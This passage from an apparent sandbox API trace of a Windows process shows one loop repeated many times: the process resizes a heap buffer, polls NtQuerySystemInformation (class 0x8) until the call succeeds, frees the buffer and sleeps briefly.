ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.877] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.877] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.877] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.878] Sleep (dwMilliseconds=0x110) [0195.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.896] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.897] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.898] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.898] Sleep (dwMilliseconds=0x110) [0195.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.911] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.912] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.912] Sleep (dwMilliseconds=0x110) [0195.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.919] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.924] Sleep (dwMilliseconds=0x110) [0195.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.939] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.943] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.944] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.945] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.945] Sleep (dwMilliseconds=0x110) [0195.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.957] Sleep (dwMilliseconds=0x110) [0195.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.974] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.975] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.975] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.976] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.976] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.976] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.977] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.977] Sleep (dwMilliseconds=0x110) [0195.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0195.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0195.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0195.989] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0195.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.989] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0195.990] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0195.990] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.990] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0195.991] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0195.991] Sleep (dwMilliseconds=0x110) [0196.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.000] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.005] Sleep (dwMilliseconds=0x110) [0196.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.020] Sleep (dwMilliseconds=0x110) [0196.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.035] Sleep (dwMilliseconds=0x110) [0196.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.052] Sleep (dwMilliseconds=0x110) [0196.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.059] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.062] Sleep (dwMilliseconds=0x110) [0196.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0196.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0196.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0196.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0196.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0196.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0196.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0196.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0196.079] Sleep (dwMilliseconds=0x110) 